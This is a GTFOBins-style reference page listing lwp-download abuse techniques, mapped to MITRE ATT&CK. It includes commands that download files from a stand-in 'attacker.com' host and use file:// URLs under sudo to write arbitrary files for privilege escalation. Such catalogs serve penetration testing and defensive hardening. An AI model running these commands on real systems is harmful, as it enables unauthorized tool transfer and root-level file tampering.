Catalog GTFOBins

GTFO · Tool

lwp-download

8 techniques LinuxGTFOBins GPL-3.0

download

File DownloadPrivilege Escalation Linux

The destination file `/path/to/output-file` can be omitted, in that case the file is saved to `input-file` in the current working directory.

lwp-download http://attacker.com/path/to/input-file /path/to/output-file
Context
sudo
Native
download
MITRE
T1105

download

File Download Linux

The destination file `/path/to/output-file` can be omitted, in that case the file is saved to `input-file` in the current working directory.

lwp-download http://attacker.com/path/to/input-file /path/to/output-file
Context
unprivileged
Native
download
MITRE
T1105

file-write

File WritePrivilege Escalation Linux
echo DATA >/path/to/temp-file
lwp-download file:///path/to/temp-file /path/to/output-file
Context
sudo
Native
file-write
MITRE
T1565

file-write

File WritePrivilege Escalation Linux

This actually copies a file to a destination.

lwp-download file:///path/to/input-file /path/to/output-file
Context
sudo
Native
file-write
MITRE
T1565

file-write

File Write Linux

This actually copies a file to a destination.

lwp-download file:///path/to/input-file /path/to/output-file
Context
unprivileged
Native
file-write
MITRE
T1565